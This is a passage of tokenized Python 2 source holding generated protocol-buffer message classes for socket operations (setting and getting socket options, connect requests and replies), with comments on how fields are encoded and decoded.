debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> for p in self . options_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . options_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : n += self . lengthString ( self . options_ [ i ] . ByteSize ( ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . options_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : n += self . lengthString ( self . options_ [ i ] . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . 
clear_socket_descriptor ( ) <EOL> self . clear_options ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . options_ [ i ] . ByteSize ( ) ) <EOL> self . options_ [ i ] . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . options_ [ i ] . ByteSizePartial ( ) ) <EOL> self . options_ [ i ] . OutputPartial ( out ) <EOL> # Decode loop: repeated options are length-delimited and merged into freshly appended elements. <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_options ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . options_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . 
__str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> koptions = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> # Generated empty reply message: no fields, so encode/decode and Clear are no-ops. Note the stray generator-emitted `pass` left in __init__ before the contents check (harmless dead statement). <EOL> class SetSocketOptionsReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> pass <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def Clear ( self ) : <EOL> pass <EOL> def OutputUnchecked ( self , out ) : <EOL> pass <EOL> def OutputPartial ( self , out ) : <EOL> pass <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . 
skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } , <NUM_LIT:0> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:0> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> # Generated request for GetSocketOptions: socket_descriptor plus repeated SocketOption entries (presumably naming the options to query — confirm against the service definition). <EOL> class GetSocketOptionsRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> self . options_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def options_size ( self ) : return len ( self . options_ ) <EOL> def options_list ( self ) : return self . options_ <EOL> def options ( self , i ) : <EOL> return self . options_ [ i ] <EOL> def mutable_options ( self , i ) : <EOL> return self . options_ [ i ] <EOL> def add_options ( self ) : <EOL> x = SocketOption ( ) <EOL> self . options_ . append ( x ) <EOL> return x <EOL> def clear_options ( self ) : <EOL> self . options_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . 
has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> for i in xrange ( x . options_size ( ) ) : self . add_options ( ) . CopyFrom ( x . options ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if len ( self . options_ ) != len ( x . options_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . options_ , x . options_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> # Requires socket_descriptor; every nested option must itself be initialized. <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> for p in self . options_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . options_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : n += self . lengthString ( self . options_ [ i ] . ByteSize ( ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . options_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : n += self . lengthString ( self . options_ [ i ] . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_options ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . 
socket_descriptor_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . options_ [ i ] . ByteSize ( ) ) <EOL> self . options_ [ i ] . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . options_ [ i ] . ByteSizePartial ( ) ) <EOL> self . options_ [ i ] . OutputPartial ( out ) <EOL> # Decode: a length-prefixed string field plus length-delimited repeated options; tag 0 raises, unknown tags are skipped. <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_options ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . options_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . 
get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> koptions = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> # Generated reply carrying only a repeated list of SocketOption results; no scalar fields. <EOL> class GetSocketOptionsReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> self . options_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def options_size ( self ) : return len ( self . options_ ) <EOL> def options_list ( self ) : return self . options_ <EOL> def options ( self , i ) : <EOL> return self . options_ [ i ] <EOL> def mutable_options ( self , i ) : <EOL> return self . options_ [ i ] <EOL> def add_options ( self ) : <EOL> x = SocketOption ( ) <EOL> self . options_ . append ( x ) <EOL> return x <EOL> def clear_options ( self ) : <EOL> self . options_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . options_size ( ) ) : self . add_options ( ) . CopyFrom ( x . options ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . options_ ) != len ( x . options_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . options_ , x . options_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . options_ : <EOL> if not p . 
IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . options_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : n += self . lengthString ( self . options_ [ i ] . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . options_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : n += self . lengthString ( self . options_ [ i ] . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_options ( ) <EOL> # Encode each nested option as a length-delimited record. <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . options_ [ i ] . ByteSize ( ) ) <EOL> self . options_ [ i ] . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . options_ [ i ] . ByteSizePartial ( ) ) <EOL> self . options_ [ i ] . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_options ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . options_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . 
__str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> koptions = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> # Generated request for Connect: required socket_descriptor and remote_ip (an eagerly allocated AddressPort), plus an optional double timeout_seconds whose default/cleared value is -1.0 (presumably a "no timeout" sentinel — confirm against the service definition). <EOL> class ConnectRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_remote_ip_ = <NUM_LIT:0> <EOL> has_timeout_seconds_ = <NUM_LIT:0> <EOL> timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . remote_ip_ = AddressPort ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def remote_ip ( self ) : return self . remote_ip_ <EOL> def mutable_remote_ip ( self ) : self . has_remote_ip_ = <NUM_LIT:1> ; return self . remote_ip_ <EOL> def clear_remote_ip ( self ) : self . has_remote_ip_ = <NUM_LIT:0> ; self . remote_ip_ . 
Clear ( ) <EOL> def has_remote_ip ( self ) : return self . has_remote_ip_ <EOL> def timeout_seconds ( self ) : return self . timeout_seconds_ <EOL> def set_timeout_seconds ( self , x ) : <EOL> self . has_timeout_seconds_ = <NUM_LIT:1> <EOL> self . timeout_seconds_ = x <EOL> def clear_timeout_seconds ( self ) : <EOL> if self . has_timeout_seconds_ : <EOL> self . has_timeout_seconds_ = <NUM_LIT:0> <EOL> self . timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def has_timeout_seconds ( self ) : return self . has_timeout_seconds_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_remote_ip ( ) ) : self . mutable_remote_ip ( ) . MergeFrom ( x . remote_ip ( ) ) <EOL> if ( x . has_timeout_seconds ( ) ) : self . set_timeout_seconds ( x . timeout_seconds ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_remote_ip_ != x . has_remote_ip_ : return <NUM_LIT:0> <EOL> if self . has_remote_ip_ and self . remote_ip_ != x . remote_ip_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ != x . has_timeout_seconds_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ and self . timeout_seconds_ != x . timeout_seconds_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> # socket_descriptor and remote_ip are required; remote_ip must also be recursively initialized. <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_remote_ip_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> elif not self . remote_ip_ . 
IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += self . lengthString ( self . remote_ip_ . ByteSize ( ) ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_remote_ip_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( self . remote_ip_ . ByteSizePartial ( ) ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_remote_ip ( ) <EOL> self . clear_timeout_seconds ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . remote_ip_ . ByteSize ( ) ) <EOL> self . remote_ip_ . OutputUnchecked ( out ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_remote_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . remote_ip_ . ByteSizePartial ( ) ) <EOL> self . remote_ip_ . OutputPartial ( out ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> # Decode: length-prefixed string, length-delimited nested AddressPort, and a fixed-width double for the timeout (ByteSize accounts 9 = 1 tag byte + 8 value bytes). <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . 
set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_remote_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_timeout_seconds ( d . getDouble ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_remote_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . remote_ip_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> if self . has_timeout_seconds_ : res += prefix + ( "<STR_LIT>" % self . DebugFormat ( self . timeout_seconds_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> kremote_ip = <NUM_LIT:2> <EOL> ktimeout_seconds = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . DOUBLE , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . 
MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ConnectReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_proxy_external_ip_ = <NUM_LIT:0> <EOL> proxy_external_ip_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def proxy_external_ip ( self ) : <EOL> if self . proxy_external_ip_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . proxy_external_ip_ is None : self . proxy_external_ip_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . proxy_external_ip_ <EOL> def mutable_proxy_external_ip ( self ) : self . has_proxy_external_ip_ = <NUM_LIT:1> ; return self . proxy_external_ip ( ) <EOL> def clear_proxy_external_ip ( self ) : <EOL> if self . has_proxy_external_ip_ : <EOL> self . has_proxy_external_ip_ = <NUM_LIT:0> ; <EOL> if self . proxy_external_ip_ is not None : self . proxy_external_ip_ . Clear ( ) <EOL> def has_proxy_external_ip ( self ) : return self . has_proxy_external_ip_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_proxy_external_ip ( ) ) : self . mutable_proxy_external_ip ( ) . MergeFrom ( x . proxy_external_ip ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_proxy_external_ip_ != x . has_proxy_external_ip_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ and self . proxy_external_ip_ != x . proxy_external_ip_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_proxy_external_ip_ and not self . proxy_external_ip_ . 
IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_proxy_external_ip ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> self . proxy_external_ip_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> self . proxy_external_ip_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) 